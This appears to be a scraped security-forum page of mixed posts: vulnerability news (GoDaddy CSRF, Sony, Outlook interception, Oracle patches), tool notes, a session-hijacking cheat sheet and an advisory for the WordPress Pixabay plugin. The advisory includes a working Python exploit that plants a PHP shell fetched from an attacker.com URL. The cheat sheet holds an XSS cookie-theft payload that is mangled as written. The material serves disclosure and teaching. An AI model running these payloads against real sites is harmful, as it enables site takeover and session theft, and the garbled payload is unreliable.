}
Source
-
# Exploit Title: Bsplayer HTTP Response BOF
# Date: Jan 17, 2015
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: www.bsplayer.com
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# Version: current (2.68).
# Tested on: Windows 7 SP1 x86 version.
# Exploit-db: http://www.exploit-db.com/author/?a=2986
# Youtube: https://www.youtube.com/user/cutehack3r

Exploit: http://www.exploit-db.com/sploits/35841.tar.gz

Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I needed to load a DLL with no null addresses and no SafeSEH, ASLR or DEP. I noticed that one of the DLLs that matches these criteria is MSVCR71.dll, and it's loaded when I loaded an FLV file over the network; that's why I'm sending a legitimate FLV file first, so that later we can use the loaded DLL. Also the space after the SEH record is pretty small, so what I did is add a small stage shellcode to add an offset to ESP so it points at the beginning of my buffer, and then a jmp esp instruction to execute the actual shellcode.

Regards,
Fady Osman
about.me/Fady_Osman
Source
-
@wikedx a pair of what? Tell us what kind of pair you found and then we can help you!
-
Domain registrar GoDaddy yesterday patched a cross-site request forgery vulnerability that could have allowed an attacker to change domain settings on a site registered with GoDaddy. The flaw was reported on Saturday and patched within 48 hours, according to Dylan Saccomanni, a web application security researcher and penetration testing consultant in New York.

“This vulnerability lies in GoDaddy domain settings (not account settings). If you go to ‘Domains’ when you log into GoDaddy, you’ll be presented with various options and settings you can edit for the specific domain you chose,” Saccomanni said. “That is where this issue is.”

Cross-site request forgery is a chronic web application vulnerability, right up there with cross-site scripting and others that continue to stand in the way of secure development. CSRF works when a user authenticated to a web application or domain is forced by a hacker to make state-changing requests, including administrative requests in this case. The attacker, however, would have to combine this with some form of social engineering scam in order to lure the victim to their site hosting the attack.

“It wouldn’t be difficult to exploit at all,” Saccomanni said. “The attacker would have a victim fill out a very professional looking form (maybe not even relating it to GoDaddy at all), and have the form perform a GoDaddy domain settings change request while they’re logged in. He could do this at scale, attracting GoDaddy users to his site, betting they’ll be logged in.”

Saccomanni said he discovered the vulnerability Saturday when looking at an old domain in GoDaddy, noticing a lack of cross-site request forgery protection on GoDaddy DNS management actions. Saccomanni said there was no CSRF token present in request body or headers, and no enforcement of Referrer. This lack of protection would give an attacker the ability to edit nameservers, change auto-renew settings and edit the zone file.

“A user could have a domain de facto taken over in several ways. If nameservers are changed, an attacker changes the domain’s nameservers (which dictates what server has control of DNS settings for that domain) over to his own nameservers, immediately having full and complete control,” Saccomanni said. “If DNS settings are changed, he simply points the victim’s domain towards an IP address under his control. If the auto-renew function is changed, the attacker will try to rely on a user forgetting to renew their domain purchase for a relatively high-profile domain, then buy it as soon as it expires.”

Saccomanni said he tried many different email addresses associated with security and engineering, as well as customer support in order to report the bug. He said he received no confirmation from GoDaddy that the issue was patched, but yesterday did see protections put in place. A request for comment and confirmation from GoDaddy was not returned in time for publication.

“The reply that I received from customer support was that 1. the security email address isn’t being actively monitored for incoming email and 2. thanking me for the feedback, but there was no timeline for a fix,” Saccomanni said, adding that he never found an official security contact with the registrar. “I wish I could give you a security contact because I wish I got one myself, but they didn’t even allow me to try and speak with a security engineer directly, which is a vastly disappointing security posture for a large domain registrar.”
Source
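The two missing controls the article names, a CSRF token in the request and enforcement of the Referer/Origin, are what separate a forgeable nameserver-change endpoint from a safe one. The block below is an added example, not GoDaddy's code: a hypothetical domain-settings handler in the vulnerable shape (session cookie is the only check) beside a hardened one that requires a session-bound HMAC token and a same-origin Origin/Referer. The origin `https://registrar.example`, the secret, the session ids and both requests are constructed for the illustration.

```python
import hashlib
import hmac

SITE_ORIGIN = "https://registrar.example"           # hypothetical origin of the domain-settings UI
SERVER_SECRET = b"constructed-server-side-secret"   # constructed; a real deployment keeps this out of source


def csrf_token(session_id: str) -> str:
    """Token bound to the session, so a token captured from one account is useless against another."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_nameservers_vulnerable(session: dict, request: dict) -> dict:
    """What the article describes: only the ambient session cookie is checked, so any page the
    victim visits while logged in can auto-submit this form and the change goes through."""
    if not session.get("authenticated"):
        return {"status": 401}
    return {"status": 200, "nameservers": request["form"]["nameservers"]}


def change_nameservers_fixed(session: dict, request: dict) -> dict:
    """Hardened form: reject cross-origin submissions and require the session-bound token."""
    if not session.get("authenticated"):
        return {"status": 401}
    source = request["headers"].get("Origin") or request["headers"].get("Referer", "")
    if source != SITE_ORIGIN and not source.startswith(SITE_ORIGIN + "/"):
        return {"status": 403, "reason": "cross-origin request"}
    expected = csrf_token(session["id"])
    if not hmac.compare_digest(request["form"].get("csrf_token", ""), expected):
        return {"status": 403, "reason": "missing or invalid CSRF token"}
    return {"status": 200, "nameservers": request["form"]["nameservers"]}


VICTIM_SESSION = {"id": "session-victim-0001", "authenticated": True}   # constructed

# Constructed: the auto-submitting form on the attacker's page, sent by the victim's browser
# with the victim's cookies attached.
FORGED_REQUEST = {
    "headers": {"Origin": "https://evil.example", "Referer": "https://evil.example/form.html"},
    "form": {"nameservers": "ns1.evil.example,ns2.evil.example"},
}


def legitimate_request(session: dict) -> dict:
    """Constructed: the same form submitted from our own settings page with its token."""
    return {
        "headers": {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/domains/settings"},
        "form": {
            "nameservers": "ns1.registrar.example,ns2.registrar.example",
            "csrf_token": csrf_token(session["id"]),
        },
    }


if __name__ == "__main__":
    print("vulnerable, forged:", change_nameservers_vulnerable(VICTIM_SESSION, FORGED_REQUEST))
    print("fixed, forged:     ", change_nameservers_fixed(VICTIM_SESSION, FORGED_REQUEST))
    print("fixed, legitimate: ", change_nameservers_fixed(VICTIM_SESSION, legitimate_request(VICTIM_SESSION)))
```

The token check alone is sufficient against CSRF; the Origin/Referer check is defence in depth and also catches a forged request that guesses the parameter layout but cannot read the token from the victim's page.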
-
PeStudio is a unique tool that performs static analysis of 32-bit and 64-bit Windows executables. A malicious executable attempts to hide its malicious intent and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PeStudio is to detect these anomalies, provide indicators and score the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Download: http://www.winitor.com/tools/PeStudio846.zip
-
Methods for detecting affine image files

forpix is a forensic program for identifying similar images that are no longer identical due to image manipulation. Hereinafter I will describe the technical background for a basic understanding of the need for such a program and how it works.

From image files, or files in general, you can create so-called cryptologic hash values, which represent a kind of fingerprint of the file. In practice, these values have the characteristic of being unique. Therefore, if the hash value for a given image is known, the image can be uniquely identified in a large amount of other images by its hash value. The advantage of this fully automated procedure is that semantic perception of the image content by a human is not required. This methodology is an integral and fundamental component of an effective forensic investigation.

Due to the avalanche effect, which is a necessary feature of cryptologic hash functions, a minimal change of the image, not recognizable by a human, causes a drastic change of the hash value. Although the original image and the manipulated image are almost identical, this no longer applies to the hash values. Therefore the above-mentioned application for identification is ineffective in the case of similar images.

A method was applied that resolves the ineffectiveness of cryptologic hash values. It uses the fact that an offender is interested in preserving certain image content. To some degree, this will preserve the contrast as well as the color and frequency distribution. The method provides three algorithms to generate robust hash values of the mentioned image features. In case of a manipulation of the image, the hash values change either not at all or only moderately, in proportion to the degree of manipulation. By comparing the hash values of a known image with those of a large quantity of other images, similar images can now be recognized fully automatically.

Download: http://rojak.de/le/forpix1.02_eng.7z

Tutorial

In order to launch the program on a Windows machine run the included batch file "forpix.bat". Otherwise, the program runs on all Java-capable machines with a 32-bit Java VM. Just use the Java flags "-jar -Xmx1024m forpix.jar" at the command prompt.

To perform a comparison the following steps are necessary. The execution of the steps is very simple in practice.
1. Create an image database.
2. Analyze the images of a seized medium and import the images and hash values into the image database in one step.
3. Analyze a reference image and perform an automated image comparison in one step.
As a result, you get for each reference image a list of the most similar images from the database.

The very short tutorial:

Create a database:
- menu "Database > Create ..."
- Choose a name along with a directory for the new database by pressing "Directory"
- Press "OK"

Import images into the database:
- menu "Image > Import"
- Optionally you can insert your user name, case number/identifier, evidence number.
- Then choose the directory where the images are stored.
- Press "Start"
- Wait a moment... A message will be shown at the end. Press "OK"

To compare an image with all images in the database:
- menu "Image > comparison..."
- Choose a reference image by pressing "file" to open the reference image file.
- For comparison press "Start".
- Wait a moment... A message will be shown at the end. Press "OK"

After that you will see a list of images similar to the reference image. To show each image just single-click on each entry in the list. To show the reference image just click "Reference Image" in the menu bar.

Read more: forpix | martin rojak
-
CapTipper: Omri Herscovici: CapTipper - Malicious HTTP traffic explorer tool

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found. The tool provides the security researcher with easy access to the files and the understanding of the network flow, and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.

Feeding CapTipper with a drive-by traffic capture (e.g. of an exploit kit) shows the user the request URIs that were sent and the response metadata. The user can at this point browse to the [URI] and receive the response back to the browser. In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more...

Download: https://github.com/omriher/CapTipper
Privileged Account Management: Lessons from the Sony Hack
Aerosol posted a topic in Stiri securitate
CNN recently revealed the methodology of the cyber attack that allowed anonymous cybercriminals Guardians of Peace direct access to their network, or the “keys to the entire building,” as one Sony Pictures Entertainment official stated. According to investigators, the attack was carried out through a set of stolen system administrator credentials; a privileged account username and password providing a golden gateway of unfettered access to employee records, unreleased films, intellectual property, email conversations and other sensitive data. The breach has now escalated to a matter of national security, with the FBI claiming North Korea as the nation state responsible for this attack based on a recent press release from the agency.

Why Hackers Love IT Admin Credentials

Access to a system administrator credential may have been the linchpin in allowing the Guardians of Peace to carry out their attack to the length and complexity they achieved; they held sensitive data hostage paired with ominous threats to moviegoers if screenings of the upcoming satirical comedy The Interview were not cancelled and their demands met. It’s difficult to say exactly what happened, as the raw details of how the hack was performed aren’t being made public yet. Based on information currently available, it’s safe to say Sony was utilizing a very poor password policy for its privileged accounts. Despite the fact that it has been common knowledge not to do so, Sony still stored sensitive, system-level passwords in plaintext in Excel spreadsheets, and made use of extremely weak passwords, like “password,” on said accounts. The public doesn’t know how often Sony was actively rotating and changing passwords on these sensitive credentials or if they were left stagnant over a long period of time.

While it’s not certain that putting all of these password security measures in place would have completely stopped the attackers, it would have mitigated the damage and perhaps slowed attackers down enough to thwart the attack before it was fully executed. Our own research, conducted this past August at the Black Hat Conference, shows that hackers who are in search of sensitive corporate data don’t look at the top executives as the most likely suspects for security weaknesses. Thirty-six percent of the hackers we surveyed indicated that IT admins were the first place they looked when attempting to penetrate an enterprise network – right behind independent contractors. These groups are at a major risk for attack because the nature of their work typically includes direct access to servers and systems housing sensitive company data, such as billing information and customer data. Once an attacker gains control of login credentials, they can swiftly compromise systems, move laterally through and gain control over the network.

Privileged Account Security Must Be a Top Priority

As hacker intelligence evolves faster than preventative technologies allow, the perimeter is not the secure defender it once was. It’s innately porous and can only block a certain percentage of those attempting to gain access to a network. Once the attacker is inside, they are on a hunt for anything of value, and often target privileged account credentials to gain access to those jewels quickly and effectively. It’s in Sony’s best interest moving forward to invest in safely storing, securing, and managing privileged account credentials such as system administrator, database administrator, ROOT, and service account passwords to prevent something like this from happening again.

This cyberattack is a wake-up call to all enterprises who have been neglecting the regular maintenance of passwords belonging to these kinds of service accounts – especially companies that have recently had any kind of downsizing, shifting of roles in IT, or new offices in other locations. Left unchecked, these accounts are extremely vulnerable. Hackers are counting on it.

What’s Next for Sony Pictures?

Given the current evidence of poor security practice and subsequent brand and financial damage at Sony Pictures, it is unlikely they used any form of third party, or even first party, auditing on stale security policies. I expect this to change for them going forward. If they are smart, they will get a third party vendor to properly audit and assess their security policies regularly. The truth is, the damage has been done. Emails have been leaked, data has been compromised. That cannot be remedied. Sony, like every other company that’s experienced a data breach, must learn from their mistakes and move forward. Sony Pictures will most likely look to a consulting firm to help them mend the damage and put a privileged account management (PAM) solution in place. PAM needs to play a central role in the rebuilding of their IT security infrastructure. Limiting account access, rotating privileged passwords on a scheduled basis and auditing account usage are key strategic pieces that not only will mitigate current levels of risk, but help set an example to other businesses industry-wide. The Sony hack’s biggest takeaway is that nobody should wait for a breach to occur to begin securing their privileged accounts.

Source
‘Session Hijacking’ is an old and routine topic in the field of application security. To make it more interesting, in this article, we are going to focus on different ways it can be performed.

Introduction for beginners

Web applications communicate using the HTTP protocol. HTTP is stateless, which means there is no support at the protocol level to identify the state of a particular request. In other words, web servers don’t have any mechanism to know whether the request is coming from a new client or from a client which is already communicating with it. So from the server perspective, every request it receives is a new request. For instance, let us say a client logged into his Facebook account by sending his credentials. Now if he wishes to see his messages, he has to send his credential information again, because the server doesn’t normally know that he was already authenticated in the previous request. This is something that developers have to do themselves. This is called ‘Session Tracking’.

How can sessions be tracked?

Sessions are tracked by developers primarily through the use of session identifiers (SIDs). Once the user is successfully authenticated, a session ID is created by the server and maintained by the server. From there on, for every request this value is checked to track the user. In other words, session IDs are used as an authentication token so that the user does not have to re-enter the credential information with every request. Based on how this SID is sent and received, there are 3 mechanisms to track sessions.

Cookies: The SID is created and maintained in the server and sent to the user through cookies. A cookie is stored in the user’s hard disk and goes with each request. The server verifies the same before executing the request. This is the most widely used mechanism and we are going to talk more about this in the below sections.

URL Rewriting: In this the SID value actually goes in the URL of each request. This kind of session tracking is difficult, as we need to keep track of the parameter as a chain link until the conversation completes.

Hidden Fields: Hidden fields are elements which are not directly visible to the user. They can be viewed by looking at the page source. Interestingly, they can also be used for session management, as SID values can be stored in hidden fields and can be sent to the server with each request. This sort of mechanism is rarely used these days.

Among these methods, cookies are the most widely used method for session management. For the remaining part of this article we will assume that we are talking about cookies when we talk about ‘session’.

What is Session Hijacking?

Session hijacking, as the name suggests, is all about knowing the session ID (SID) of an active user so that his account can be impersonated or hijacked. After a user enters his credentials, the application tries to identify him only based on his cookie value (which contains the SID). Hence, if this SID value of any active user is known to us, we can use the same and login to the application as the victim and thus get access to all of the information. And if the session ID is gone, everything is gone!

Session Hijacking Cheat Sheet

Let us now take a look at different ways or scenarios in which active sessions can be hijacked.

Session sidejacking

If the application does not use SSL and transports the data in plain text, then anyone within the same network can grab the cookie values just by sniffing the traffic using tools such as Wireshark. There are a few cases worth mentioning here:

SSL only for login page: Of course if there is no SSL then the credentials too would be gone (forget about cookies!), but there are some developers who use SSL for the login page alone, assuming that the credentials are transported safely. But once the user is authenticated, it is the cookies (that go with each request) that identify him. All the requests that are done after logging in contain cookies, and if they are not protected with SSL, the session can be easily hijacked. Thus the password may not be stolen, but the session can be hijacked.

Single URL is enough to hijack a user: There are several cases where the application uses HTTP to fetch image or JS files that belong to the same domain. The problem is when you send a request to a domain in which you are already signed in, the cookies would automatically go. That is how cookies work. So in simple words, even if there is a single link which goes to the server without HTTPS, the cookies would go along with it and can be grabbed by an attacker who is sniffing the network.

Session fixation

Session fixation is an attack where the attacker fixes the session in advance and just waits for the user to login in order to hijack it. This is very much applicable to the SIDs in the URL scenario. If the application associates a user with an incoming SID without checking if it is generated by the server, then this attack is possible.

1. An attacker logs into the site www.vulnerablesite.com. The server sets a cookie value and returns it to him, say
   Set-Cookie: SID=adfajkdfjer23411sdfadf
2. The attacker now sends a link to the victim,
   http://www.vulnerablesite.com/test.php?SID=adfajkdfjer23411sdfadf
3. The victim logs on and the server now assigns the SID value to him. (Why? Due to bad coding, the server does not check if it is generated by itself and tags it with the users.)
4. The attacker, who already knows the SID value he used, can now just use the same and access the victim’s account.

Generating cookies before authentication

Cookies are supposed to be generated (or at least changed) after successful authentication. If the same cookie which is generated before authentication is used after authentication, then session hijacking is possible, as explained here with a simple example. This is mostly exploitable in a public café or shared computers scenario.

1. An attacker visits the site www.vulnerablesite.com. The server sets a cookie value and returns it to him, say
   Set-Cookie: SID=randomqrrqwer234234234
2. The attacker notes down this value and leaves the system, keeping the page open.
3. The victim now logs into the same site. The cookie value does not change after authentication.
4. The attacker, who already has the cookie value, can access the victim’s account.

Predictable session IDs

By analyzing the pattern of session IDs, an attacker can predict the session ID of a logged in user and thus hijack his account. For example, consider the below session cookie set by an application.

Set-Cookie: sessionid=dG9tOm1hbmFnZXI=

Although this seems to be random at first look, it is not actually! Base 64 decoding of the above value gives the below data.

Base64 Decode [dG9tOm1hbmFnZXI=] = tom:manager

Thus an attacker can study this pattern and construct a valid cookie, for instance something like Base64 Decode [admin:admin]. Similarly, if the session IDs are not random enough, an attacker can try to brute force them to gain access to the application.

Using Cross Site Scripting vulnerability

This article assumes that the reader is aware of what an XSS attack is about. So we are going to take a look at how XSS can be used to steal the SID or cookie value. In simple words, XSS allows an attacker to execute scripts (such as JavaScript) on an end user’s browser. Hence an attacker just needs to write a script that can access the cookie value and send it to a server he owns. The below script does the same thing. It hits the attacker’s site with the cookie value. Accessing the cookie on the client side is possible through use of document.cookie.

http://www.vulnerablesite.com/xssvulnerablepage.jsp?name=<script>document.location= “Thank You + document.cookie</script>

Session puzzle attacks

This vulnerability occurs when an application uses the same session variable for more than one purpose. Here an attacker tries to access the pages in a particular order so that the session variable is set in one context and then used in another. This is best explained in the below scenario.

1. An attacker visits the application and clicks on the ‘Forgot Password’ link.
2. Now he enters some other user’s ID (say admin) and clicks submit.
3. After this the attacker just requests some internal page such as viewprofile.jsp and he logs in as admin.

This worked because the application wrongly sets the session attribute when the forgot password process is initiated. The attacker takes advantage of this and exploits it by requesting it in a sequence. These types of vulnerabilities are more difficult to identify through normal testing, and hence source code reviews are the best way to look out for such vulnerabilities.

Improper logout implementation

When a user clicks on the logout button, the application is supposed to destroy all the session variables that are handled on the server side. But instead, some developers just delete the cookies from the client side using client side code. This seems to work fine when you browse normally, because once the cookies are removed from the machine it will redirect to the login page, but the session on the server is active indefinitely. This means that an attacker who can grab this value can still access the application. This scenario increases the time period an attacker can launch attacks over valid sessions.

Lack of session expiration mechanism

All applications should track idle sessions and automatically redirect the user to a login page upon session timeout. Failure to do so would not only increase the time period an attacker can launch attacks, but also grant access to the application if he has physical access to that machine. Once again, this session expiration must be done at the server level and not just at the client level.

Source
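The server-side behaviours the article contrasts (adopting a planted SID, keeping the pre-login SID after authentication, client-only logout, no idle timeout) modelled side by side, as an added Python example that is not part of the original article. The SessionStore class, its method names, the 900-second timeout and the demo functions are constructed for this illustration; only the planted SID value is taken from the article.

```python
import hmac
import secrets
import time

IDLE_TIMEOUT = 900  # seconds of inactivity before a session is dropped (value chosen for this example)


class SessionStore:
    """In-memory server-side session table keyed by session ID (SID).

    hardened=False reproduces the weak behaviours described above: a client-supplied
    SID is adopted as-is (fixation), the SID survives authentication, and logout only
    asks the client to drop its cookie. hardened=True issues SIDs from the OS CSPRNG,
    rotates the SID on login, destroys the record on logout and expires idle sessions.
    """

    def __init__(self, hardened=True, clock=time.monotonic):
        self.hardened = hardened
        self.clock = clock
        self._sessions = {}  # sid -> {"user": str or None, "last_seen": float}

    @staticmethod
    def _new_sid():
        return secrets.token_urlsafe(32)  # 256 random bits, unrelated to any user data

    def _find(self, sid):
        # constant-time compare against each stored key: no early-exit prefix leak
        for known in self._sessions:
            if hmac.compare_digest(known.encode(), sid.encode()):
                return known
        return None

    def _alive(self, sid):
        """Resolve a SID, dropping it if idle too long (hardened mode), and touch it."""
        known = self._find(sid)
        if known is None:
            return None
        rec = self._sessions[known]
        if self.hardened and self.clock() - rec["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[known]
            return None
        rec["last_seen"] = self.clock()
        return known

    def begin(self, presented_sid=None):
        """Unauthenticated request; the client may present a SID from a cookie or URL."""
        if presented_sid is not None:
            if self._alive(presented_sid):
                return presented_sid
            if not self.hardened:  # vulnerable: server tags a SID it never generated
                self._sessions[presented_sid] = {"user": None, "last_seen": self.clock()}
                return presented_sid
        sid = self._new_sid()
        self._sessions[sid] = {"user": None, "last_seen": self.clock()}
        return sid

    def login(self, sid, user):
        """Successful authentication; returns the SID the client must use from now on."""
        known = self._alive(sid) or self.begin()
        if not self.hardened:
            self._sessions[known]["user"] = user  # pre-auth SID kept: a planted SID now works
            return known
        del self._sessions[known]  # hardened: retire the pre-authentication SID ...
        fresh = self._new_sid()    # ... and bind a fresh one to the user
        self._sessions[fresh] = {"user": user, "last_seen": self.clock()}
        return fresh

    def whoami(self, sid):
        """Identity the server associates with this SID, or None."""
        known = self._alive(sid)
        return self._sessions[known]["user"] if known else None

    def logout(self, sid):
        """Logout handler; the client gets the same cookie-clearing header either way."""
        known = self._alive(sid)
        if known and self.hardened:
            del self._sessions[known]  # destroy server-side state, not only the cookie
        return "Set-Cookie: SID=; Max-Age=0"


def fixation_demo(hardened):
    """Attacker plants a SID, the victim logs in with it: does the planted SID now work?"""
    store = SessionStore(hardened=hardened)
    planted = "adfajkdfjer23411sdfadf"  # the SID value used in the article's example
    store.login(store.begin(planted), "victim")  # victim follows the link, then logs in
    return store.whoami(planted) == "victim"


def logout_demo(hardened):
    """Does a SID captured before logout still resolve to the user afterwards?"""
    store = SessionStore(hardened=hardened)
    sid = store.login(store.begin(), "alice")
    store.logout(sid)
    return store.whoami(sid) == "alice"


def expiry_demo():
    """With a fake clock, an idle hardened session is gone after IDLE_TIMEOUT."""
    now = [0.0]
    store = SessionStore(hardened=True, clock=lambda: now[0])
    sid = store.login(store.begin(), "bob")
    now[0] += IDLE_TIMEOUT + 1
    return store.whoami(sid)
```

In the weak configuration both demos return True (the planted or pre-logout SID still resolves to the victim); in the hardened one they return False, and the idle session resolves to nobody.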
Chinese hackers have launched a wave of man-in-the-middle (MITM) attacks, capable of stealing emails, contacts and passwords, that is targeting Microsoft Outlook users in the country.

Greatfire.org, a group that reports on and works to combat Chinese government online censorship and surveillance, reported uncovering the campaign this week.

"On January 17, we received reports that Microsoft's email system, Outlook (which was merged with Hotmail in 2013), was subjected to a MITM attack in China," read the Greatfire threat advisory. "This form of attack is especially devious because the warning messages users receive from their email clients are much less noticeable than the warning messages delivered to modern browsers."

The attack reportedly uses a bogus certificate to push a malicious alert to Outlook users that siphons information from the victim's account if it is opened.

"Users will only see an abrupt pop-up warning when the client tries to automatically retrieve messages. Users will then be able to tap on a 'continue' button and ignore the warning message," explained the advisory. "If users do click on the 'continue' button, all of their emails, contacts and passwords will be logged by the attackers."

The number of affected Outlook users remains unknown, although a Microsoft spokesperson confirmed to V3 that the firm is aware of the attacks.

"We are aware of a small number of customers impacted by malicious routing to a server impersonating Outlook.com. If a customer sees a certificate warning, they should contact their service provider for assistance," they said.

Greatfire believes that the Chinese government is responsible for the attacks, citing similarities to previous attacks it believed were state sponsored.

"Because of the similarity between this attack and previous, recent MITM attacks in China on Google, Yahoo and Apple, we once again suspect that Lu Wei and the Cyberspace Administration of China have orchestrated this attack," it said. "If our accusation is correct, this new attack signals that the Chinese authorities are intent on further cracking down on communication methods that they cannot readily monitor."

The attack on Apple's iCloud occurred at the end of 2014 and was serious enough for CEO Tim Cook to fly to China.

F-Secure security advisor Sean Sullivan told V3 that the Outlook attacks follow a similar pattern to the iCloud campaign and warned business users visiting China to be extra cautious.

"This case appears similar to the move against iCloud back in October. Any business person travelling or working in China should use a VPN (or other measures) to access their email - or else pay very careful attention to warning messages," he said. "If you're doing business in China, be very mindful of the situation. I'd even recommend using separate hardware for the trip."

Jason Steere, director of technology strategy at FireEye, mirrored Sullivan's sentiment, pointing out that, even if focused on monitoring Chinese citizens alone, the attacks could cause trouble for Western professionals visiting the country.

"I suspect this attack is more about gathering intel on Chinese citizens - using international mail systems to communicate information that they could not do with a Chinese web platform due to censorship," he told V3. "However, many other people are collateral damage with information exposed that I'm sure they would prefer not to be picked up.

"Anything sent or received, such as usernames, passwords, holidays, journalist sources, new stories, personal information etc, would all have been exposed during the time of the attack.

"All of that information can be collected and used for intel, surveillance etc."

The attack on Outlook comes less than a month after Chinese authorities began blocking local access to Google services including Gmail. Prior to the Google blockade the Beijing government mounted a mass censorship campaign that cut off access to thousands of websites, applications and cloud services in November 2014.

Source
Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers.

The pressing fixes involve several of Oracle's most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score available.

"The highest CVSS 2.0 Base Score for vulnerabilities in this critical patch update is 10.0 for Fujitsu M10-1 of Oracle Sun Systems Products Suite, Java SE of Oracle Java SE, M10-4 of Oracle Sun Systems Products Suite and M10-4S Servers of Oracle Sun Systems Products Suite," read the advisory. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply critical patch update fixes as soon as possible."

Oracle warned that the updates for Fujitsu M10-1 of Oracle Sun Systems Products Suite are particularly important.

"This critical patch update contains 29 new security fixes for the Oracle Sun Systems Products Suite," the advisory said. "Ten of these vulnerabilities may be remotely exploitable without authentication [and] may be exploited over a network without the need for a username and password."

The Oracle Java SE update fixes 19 flaws, 14 of which were also remotely exploitable. The next most serious flaws relate to Oracle's Fusion Middleware, which received 35 security fixes. The worst carries a 9.3 rating and could also be remotely exploited.

The update follows reports that hackers are targeting enterprise companies with malware-laden patches purporting to come from Oracle.

The news comes during a period of heated debate about patching best practice. Microsoft announced plans on 9 January to stop offering non-paying customers advanced patch notifications. The announcement led to a backlash in the security community, with many feeling that the move is a money-grabbing tactic by Microsoft.

Prior to the move, Microsoft came to blows with Google over the search firm's public disclosure of a Windows bug. Google Project Zero researchers publicly disclosed the bug in December 2014 having privately reported it to Microsoft in September. The move led to a debate about what constitutes responsible threat disclosure.

Source
Tor-ramdisk is a uClibc-based micro Linux distribution whose sole purpose is to securely host a Tor server purely in RAM. For those not familiar with Tor, it is a system which allows the user to construct encrypted virtual tunnels which are randomly relayed between Tor servers (nodes) until the connection finally exits to its destination on the internet. The encryption and random relaying resist traffic analysis in that a malicious sniffer cannot easily discover where the traffic is coming from or what data it contains. While not perfect in its efforts to provide users with anonymity, Tor does help protect against unscrupulous companies, individuals or agencies "watching us". For more information, see the Tor official site.

The usefulness of a RAM only environment for Tor became apparent to me when Janssen was arrested by the German police towards the end of July, 2007. (You can read the full story in a CNET article.) While the police did not seize the computer for whatever reasons, they certainly could have. More typically, it would have been taken for forensic analysis of the data on the drives. Of course, if the computer housing the Tor server has no drives, there can be no question that it is purely a network relaying device and that one should look elsewhere for the "goods".

Other advantages became clear:
- It is useful to operators that want all traces of the server to disappear on powerdown. This includes the private SSL keys which can be housed externally.
- The environment can be hardened in a manner specific to the limited needs of Tor.
- It has the usual speed advantages of diskless systems and can run on older hardware.

The only known disadvantage is that it cannot host Tor hidden services which would require other services (e.g. http), and their resources (e.g. hard drive space), in addition to the Tor server itself. However, as a middle or exit node, it is ideal.

Download

Read more: Tor-ramdisk | opensource.dyc.edu
WordPress Pixarbay Images 2.3 XSS / Bypass / Upload / Traversal
Aerosol posted a topic in Exploituri
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
Title: WP Pixarbay Images Multiple Vulnerabilities
Product: Pixarbay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that lets you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required.

Business recommendation:
----------------------------------------------------------------------
Update to version 2.4

Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain code can be called without authentication.

2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL, which allows uploading malicious files, including PHP code.

3) Path Traversal
Certain values are not sanitized before they are used in a file operation. This allows storing files outside of the "download" folder.

4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks.

Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from an attacker-controlled host.

#!/usr/bin/env python
import argparse
import httplib, urllib
from urlparse import urlparse

def exploit(target_url, shellcode_url):
    target = urlparse(target_url)
    params = urllib.urlencode({'pixabay_upload': 1,
                               'image_url': shellcode_url,
                               'image_user': 'none',
                               'q': 'xxx/../../../../../../mogwai'})
    headers = {"Content-type": "application/x-www-form-urlencoded"}

    print "[+] Sending download request...."
    conn = httplib.HTTPConnection(target.netloc)
    conn.request("POST", target.path + "/wp-admin/", params, headers)
    response = conn.getresponse()
    response_data = response.read()

    if response.status != 200 and response_data != "Error: File attachment metadata error":
        print "[-] Something went wrong"
        print response_data
        exit()
    conn.close()

# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php")

print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"

arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)

Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3

Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory

Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab

----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de

Source
A critical vulnerability discovered in Verizon's FiOS mobile application allowed an attacker to access the email account of any Verizon customer with relative ease, leaving almost five million user accounts of Verizon's FiOS application at risk.

